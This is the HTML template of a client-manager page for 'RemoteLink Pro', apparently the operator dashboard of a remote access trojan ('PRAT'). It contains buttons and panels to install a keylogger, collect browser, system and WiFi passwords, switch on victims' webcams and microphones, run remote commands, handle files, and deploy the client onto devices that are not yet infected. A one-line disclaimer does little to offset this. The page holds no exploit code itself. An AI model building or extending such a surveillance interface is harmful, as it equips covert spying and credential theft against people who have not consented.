<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Client Manager - RemoteLink Pro</title>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css">
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.2.1/css/all.min.css">
    <link rel="stylesheet" href="/static/css/dashboard.css">
    <link rel="stylesheet" href="/static/css/client_manager.css">
</head>
<body>
    <!-- Navigation -->
    <nav class="navbar navbar-expand-lg navbar-dark bg-dark">
        <div class="container-fluid">
            <a class="navbar-brand" href="/">
                <i class="fas fa-laptop-code me-2"></i>RemoteLink Pro
            </a>
            <button class="navbar-toggler" type="button" data-bs-toggle="collapse" data-bs-target="#navbarNav">
                <span class="navbar-toggler-icon"></span>
            </button>
            <div class="collapse navbar-collapse" id="navbarNav">
                <ul class="navbar-nav">
                    <li class="nav-item">
                        <a class="nav-link" href="/"><i class="fas fa-chart-line me-1"></i>Dashboard</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="/processes"><i class="fas fa-microchip me-1"></i>Processes</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="/network"><i class="fas fa-network-wired me-1"></i>Network</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="/logs"><i class="fas fa-clipboard-list me-1"></i>Logs</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="/file_manager"><i class="fas fa-folder-open me-1"></i>Files</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="/remote_control"><i class="fas fa-terminal me-1"></i>Remote Control</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link active" href="/client_manager"><i class="fas fa-laptop me-1"></i>Clients</a>
                    </li>
                    <li class="nav-item">
                        <a class="nav-link" href="/advanced_control"><i class="fas fa-code me-1"></i>Advanced</a>
                    </li>
                </ul>
                <ul class="navbar-nav ms-auto">
                    <li class="nav-item">
                        <a class="nav-link" href="/logout"><i class="fas fa-sign-out-alt me-1"></i>Logout</a>
                    </li>
                </ul>
            </div>
        </div>
    </nav>

    <!-- Main Content -->
    <div class="container-fluid mt-4">
        <div class="row mb-4">
            <div class="col">
                <h2><i class="fas fa-laptop me-2"></i>PRAT Client Manager</h2>
                <p class="text-muted">Manage and control connected PRAT clients</p>
            </div>
            <div class="col-auto">
                <button class="btn btn-primary" id="refreshClientsBtn">
                    <i class="fas fa-sync-alt me-1"></i>Refresh Clients
                </button>
            </div>
        </div>

        <!-- Client List -->
        <div class="row mb-4">
            <div class="col">
                <div class="card">
                    <div class="card-header bg-dark text-white">
                        <h5 class="card-title mb-0">
                            <i class="fas fa-network-wired me-2"></i>Connected Clients
                        </h5>
                    </div>
                    <div class="card-body">
                        <div class="row" id="clientList">
                            <div class="col-12 text-center py-5" id="noClientsMessage">
                                <i class="fas fa-laptop fa-3x mb-3 text-muted"></i>
                                <h5>No clients connected</h5>
                                <p class="text-muted">Waiting for PRAT clients to connect...</p>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>

        <!-- Client Details -->
        <div class="row" id="clientDetails" style="display: none;">
            <div class="col">
                <div class="card">
                    <div class="card-header bg-dark text-white d-flex justify-content-between align-items-center">
                        <h5 class="card-title mb-0">
                            <i class="fas fa-laptop-code me-2"></i>Client Control Panel: <span id="clientDetailTitle">Unknown</span>
                        </h5>
                        <button type="button" class="btn-close btn-close-white" id="closeClientDetails"></button>
                    </div>
                    <div class="card-body">
                        <!-- Client Control Tabs -->
                        <ul class="nav nav-tabs mb-4" id="clientTabs">
                            <li class="nav-item">
                                <a class="nav-link active" id="info-tab" data-bs-toggle="tab" href="#info">System Info</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" id="terminal-tab" data-bs-toggle="tab" href="#terminal">Remote Terminal</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" id="surveillance-tab" data-bs-toggle="tab" href="#surveillance">Surveillance</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" id="remote-control-tab" data-bs-toggle="tab" href="#remote-control">Remote Device Control</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" id="keylogger-tab" data-bs-toggle="tab" href="#keylogger">Keylogger</a>
                            </li>
                            <li class="nav-item">
                                <a class="nav-link" id="files-tab" data-bs-toggle="tab" href="#files">File Access</a>
                            </li>
                        </ul>

                        <!-- Tab Content -->
                        <div class="tab-content">
                            <!-- System Info Tab -->
                            <div class="tab-pane fade show active" id="info">
                                <div class="row">
                                    <div class="col-md-6">
                                        <h5><i class="fas fa-info-circle me-2"></i>System Information</h5>
                                        <table class="table table-striped">
                                            <tbody id="systemInfoTable">
                                                <tr><td colspan="2" class="text-center">Loading...</td></tr>
                                            </tbody>
                                        </table>
                                    </div>
                                    <div class="col-md-6">
                                        <h5><i class="fas fa-cogs me-2"></i>Quick Actions</h5>
                                        <div class="d-grid gap-2">
                                            <button class="btn btn-outline-primary" id="refreshSystemInfoBtn">
                                                <i class="fas fa-sync-alt me-1"></i>Refresh System Info
                                            </button>
                                            <button class="btn btn-outline-danger" id="shutdownSystemBtn">
                                                <i class="fas fa-power-off me-1"></i>Shutdown System
                                            </button>
                                            <button class="btn btn-outline-warning" id="restartSystemBtn">
                                                <i class="fas fa-redo me-1"></i>Restart System
                                            </button>
                                            <button class="btn btn-outline-secondary" id="logoutUserBtn">
                                                <i class="fas fa-sign-out-alt me-1"></i>Logout User
                                            </button>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <!-- Remote Terminal Tab -->
                            <div class="tab-pane fade" id="terminal">
                                <h5><i class="fas fa-terminal me-2"></i>Remote Command Execution</h5>
                                <div class="terminal" id="terminalOutput"></div>
                                <div class="input-group">
                                    <input type="text" class="form-control terminal-input" id="commandInput" placeholder="Enter command...">
                                    <button class="btn btn-primary" id="sendCommandBtn">
                                        <i class="fas fa-paper-plane me-1"></i>Send
                                    </button>
                                </div>
                                <div class="mt-3">
                                    <h6>Quick Commands</h6>
                                    <button class="btn btn-sm btn-outline-secondary me-1 mb-1" data-command="systeminfo">
                                        systeminfo
                                    </button>
                                    <button class="btn btn-sm btn-outline-secondary me-1 mb-1" data-command="ipconfig">
                                        ipconfig
                                    </button>
                                    <button class="btn btn-sm btn-outline-secondary me-1 mb-1" data-command="tasklist">
                                        tasklist
                                    </button>
                                    <button class="btn btn-sm btn-outline-secondary me-1 mb-1" data-command="netstat -an">
                                        netstat -an
                                    </button>
                                    <button class="btn btn-sm btn-outline-secondary me-1 mb-1" data-command="dir">
                                        dir
                                    </button>
                                    <h6 class="mt-3">Remote Device Control</h6>
                                    <button class="btn btn-sm btn-outline-danger me-1 mb-1" data-command="install_keylogger">
                                        Install Keylogger
                                    </button>
                                    <button class="btn btn-sm btn-outline-danger me-1 mb-1" data-command="start_remote_screen">
                                        Start Remote Screen
                                    </button>
                                    <button class="btn btn-sm btn-outline-danger me-1 mb-1" data-command="collect_passwords">
                                        Collect Passwords
                                    </button>
                                    <button class="btn btn-sm btn-outline-danger me-1 mb-1" data-command="connect_android">
                                        Connect Android
                                    </button>
                                    <button class="btn btn-sm btn-outline-danger me-1 mb-1" data-command="connect_windows">
                                        Connect Windows
                                    </button>
                                </div>
                                <div class="mt-3">
                                    <h6>Command History</h6>
                                    <div class="command-history" id="commandHistory">
                                        <p class="text-muted">No commands executed yet</p>
                                    </div>
                                </div>
                            </div>

                            <!-- Surveillance Tab -->
                            <div class="tab-pane fade" id="surveillance">
                                <div class="row">
                                    <div class="col-md-8">
                                        <h5><i class="fas fa-camera me-2"></i>Screen Capture</h5>
                                        <div class="screenshot-container">
                                            <img id="screenshotImage" src="/static/img/no-screenshot.png" alt="Screenshot" class="img-fluid">
                                            <div class="screenshot-overlay">
                                                <button class="btn btn-primary" id="refreshScreenshotBtn">
                                                    <i class="fas fa-camera me-1"></i>Refresh
                                                </button>
                                            </div>
                                        </div>
                                        <div class="d-flex justify-content-between">
                                            <button class="btn btn-primary" id="takeScreenshotBtn">
                                                <i class="fas fa-camera me-1"></i>Take Screenshot
                                            </button>
                                            <button class="btn btn-success" id="toggleScreenShareBtn">
                                                <i class="fas fa-play me-1"></i>Start Live View
                                            </button>
                                        </div>
                                        <p class="text-muted mt-2">
                                            <small>Last updated: <span id="screenshotTimestamp">Never</span></small>
                                        </p>
                                    </div>
                                    <div class="col-md-4">
                                        <h5><i class="fas fa-sliders-h me-2"></i>Surveillance Controls</h5>
                                        <div class="d-grid gap-2">
                                            <button class="btn btn-outline-primary" id="startWebcamBtn">
                                                <i class="fas fa-video me-1"></i>Access Webcam
                                            </button>
                                            <button class="btn btn-outline-danger" id="stopWebcamBtn">
                                                <i class="fas fa-video-slash me-1"></i>Stop Webcam
                                            </button>
                                            <button class="btn btn-outline-primary" id="startMicrophoneBtn">
                                                <i class="fas fa-microphone me-1"></i>Access Microphone
                                            </button>
                                            <button class="btn btn-outline-danger" id="stopMicrophoneBtn">
                                                <i class="fas fa-microphone-slash me-1"></i>Stop Microphone
                                            </button>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <!-- Remote Device Control Tab -->
                            <div class="tab-pane fade" id="remote-control">
                                <div class="row mt-3">
                                    <div class="col-12">
                                        <div class="alert alert-danger">
                                            <i class="fas fa-exclamation-triangle me-2"></i>
                                            <strong>Warning:</strong> Remote control features allow full access to the target device. Use responsibly and only on devices you own or have permission to access.
                                        </div>
                                    </div>
                                </div>
                                <div class="row mt-3">
                                    <div class="col-md-6">
                                        <div class="card mb-3">
                                            <div class="card-header bg-danger text-white">
                                                <h5 class="mb-0">Remote Screen Control</h5>
                                            </div>
                                            <div class="card-body">
                                                <p>Take control of the remote device's screen like AnyDesk or TeamViewer.</p>
                                                <button class="btn btn-danger" onclick="clientManager.startRemoteScreen()">Start Remote Screen Control</button>
                                                <div class="mt-3">
                                                    <small class="text-muted">Click on the screen to send mouse clicks to the remote device.</small>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6">
                                        <div class="card mb-3">
                                            <div class="card-header bg-danger text-white">
                                                <h5 class="mb-0">Keylogger</h5>
                                            </div>
                                            <div class="card-body">
                                                <p>Install a keylogger to capture all keystrokes on the remote device.</p>
                                                <button class="btn btn-danger" onclick="clientManager.installKeylogger()">Install Keylogger</button>
                                                <div class="mt-3">
                                                    <small class="text-muted">Captured keystrokes will appear in the Keylogger tab.</small>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                                <div class="row mt-3">
                                    <div class="col-md-6">
                                        <div class="card mb-3">
                                            <div class="card-header bg-danger text-white">
                                                <h5 class="mb-0">Password Collection</h5>
                                            </div>
                                            <div class="card-body">
                                                <p>Extract stored passwords from browsers, system accounts, and WiFi networks.</p>
                                                <button class="btn btn-danger" onclick="clientManager.collectPasswords()">Collect Passwords</button>
                                                <div class="mt-3">
                                                    <small class="text-muted">Collected passwords will be displayed in the Keylogger tab.</small>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-6">
                                        <div class="card mb-3">
                                            <div class="card-header bg-danger text-white">
                                                <h5 class="mb-0">Connect to New Device</h5>
                                            </div>
                                            <div class="card-body">
                                                <p>Connect to another device that is not currently running the client.</p>
                                                <button class="btn btn-danger me-2" onclick="clientManager.connectToDevice('android')">Connect to Android</button>
                                                <button class="btn btn-danger" onclick="clientManager.connectToDevice('windows')">Connect to Windows</button>
                                                <div class="mt-3">
                                                    <small class="text-muted">This will attempt to connect to a device remotely and deploy the client.</small>
                                                </div>
                                            </div>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <!-- Keylogger Tab -->
                            <div class="tab-pane fade" id="keylogger">
                                <div class="row">
                                    <div class="col-md-8">
                                        <h5><i class="fas fa-keyboard me-2"></i>Keylogger Data</h5>
                                        <div class="keylog-data" id="keylogData">
                                            <p class="text-muted">No keylog data available</p>
                                        </div>
                                    </div>
                                    <div class="col-md-4">
                                        <h5><i class="fas fa-sliders-h me-2"></i>Keylogger Controls</h5>
                                        <div class="d-grid gap-2">
                                            <button class="btn btn-success" id="startKeyloggerBtn">
                                                <i class="fas fa-play me-1"></i>Start Keylogger
                                            </button>
                                            <button class="btn btn-danger" id="stopKeyloggerBtn">
                                                <i class="fas fa-stop me-1"></i>Stop Keylogger
                                            </button>
                                            <button class="btn btn-primary" id="checkKeyloggerStatusBtn">
                                                <i class="fas fa-info-circle me-1"></i>Check Status
                                            </button>
                                            <button class="btn btn-secondary" id="clearKeylogDataBtn">
                                                <i class="fas fa-trash me-1"></i>Clear Data
                                            </button>
                                        </div>
                                    </div>
                                </div>
                            </div>

                            <!-- File Access Tab -->
                            <div class="tab-pane fade" id="files">
                                <div class="row">
                                    <div class="col-md-8">
                                        <h5><i class="fas fa-folder-open me-2"></i>File Browser</h5>
                                        <div class="input-group mb-3">
                                            <input type="text" class="form-control" id="directoryPath" placeholder="Enter directory path..." value="C:\\">
                                            <button class="btn btn-primary" id="browseDirectoryBtn">
                                                <i class="fas fa-search me-1"></i>Browse
                                            </button>
                                        </div>
                                        <div class="card">
                                            <div class="card-body p-0">
                                                <table class="table table-hover mb-0">
                                                    <thead>
                                                        <tr>
                                                            <th>Name</th>
                                                            <th>Type</th>
                                                            <th>Size</th>
                                                            <th>Actions</th>
                                                        </tr>
                                                    </thead>
                                                    <tbody id="fileList">
                                                        <tr>
                                                            <td colspan="4" class="text-center">No files loaded</td>
                                                        </tr>
                                                    </tbody>
                                                </table>
                                            </div>
                                        </div>
                                    </div>
                                    <div class="col-md-4">
                                        <h5><i class="fas fa-file-upload me-2"></i>File Operations</h5>
                                        <div class="d-grid gap-2">
                                            <button class="btn btn-outline-primary" data-bs-toggle="modal" data-bs-target="#uploadFileModal">
                                                <i class="fas fa-file-upload me-1"></i>Upload File
                                            </button>
                                            <button class="btn btn-outline-success" id="downloadFileBtn" disabled>
                                                <i class="fas fa-file-download me-1"></i>Download Selected
                                            </button>
                                            <button class="btn btn-outline-danger" id="deleteFileBtn" disabled>
                                                <i class="fas fa-trash me-1"></i>Delete Selected
                                            </button>
                                            <button class="btn btn-outline-secondary" data-bs-toggle="modal" data-bs-target="#createFileModal">
                                                <i class="fas fa-file-medical me-1"></i>Create New File
                                            </button>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        </div>
                    </div>
                </div>
            </div>
        </div>
    </div>

    <!-- Upload File Modal -->
    <div class="modal fade" id="uploadFileModal" tabindex="-1">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title"><i class="fas fa-file-upload me-2"></i>Upload File</h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal"></button>
                </div>
                <div class="modal-body">
                    <form id="uploadFileForm">
                        <div class="mb-3">
                            <label for="uploadDestination" class="form-label">Destination Path</label>
                            <input type="text" class="form-control" id="uploadDestination" value="C:\\">
                        </div>
                        <div class="mb-3">
                            <label for="fileToUpload" class="form-label">Select File</label>
                            <input type="file" class="form-control" id="fileToUpload">
                        </div>
                    </form>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
                    <button type="button" class="btn btn-primary" id="uploadFileBtn">
                        <i class="fas fa-upload me-1"></i>Upload
                    </button>
                </div>
            </div>
        </div>
    </div>

    <!-- Create File Modal -->
    <div class="modal fade" id="createFileModal" tabindex="-1">
        <div class="modal-dialog modal-lg">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title"><i class="fas fa-file-medical me-2"></i>Create New File</h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal"></button>
                </div>
                <div class="modal-body">
                    <form id="createFileForm">
                        <div class="mb-3">
                            <label for="createFilePath" class="form-label">File Path</label>
                            <input type="text" class="form-control" id="createFilePath" placeholder="C:\path\to\file.txt">
                        </div>
                        <div class="mb-3">
                            <label for="createFileContent" class="form-label">File Content</label>
                            <textarea class="form-control" id="createFileContent" rows="10"></textarea>
                        </div>
                    </form>
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Cancel</button>
                    <button type="button" class="btn btn-primary" id="createFileBtn">
                        <i class="fas fa-save me-1"></i>Create File
                    </button>
                </div>
            </div>
        </div>
    </div>

    <!-- Alert Modal -->
    <div class="modal fade" id="alertModal" tabindex="-1">
        <div class="modal-dialog">
            <div class="modal-content">
                <div class="modal-header">
                    <h5 class="modal-title" id="alertTitle">Alert</h5>
                    <button type="button" class="btn-close" data-bs-dismiss="modal"></button>
                </div>
                <div class="modal-body" id="alertMessage">
                    Alert message here
                </div>
                <div class="modal-footer">
                    <button type="button" class="btn btn-primary" data-bs-dismiss="modal">OK</button>
                </div>
            </div>
        </div>
    </div>

    <!-- Scripts -->
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/js/bootstrap.bundle.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/chart.js@3.9.1/dist/chart.min.js"></script>
    <script src="/static/js/dashboard.js"></script>
    <script src="/static/js/client_manager.js"></script>
</body>
</html>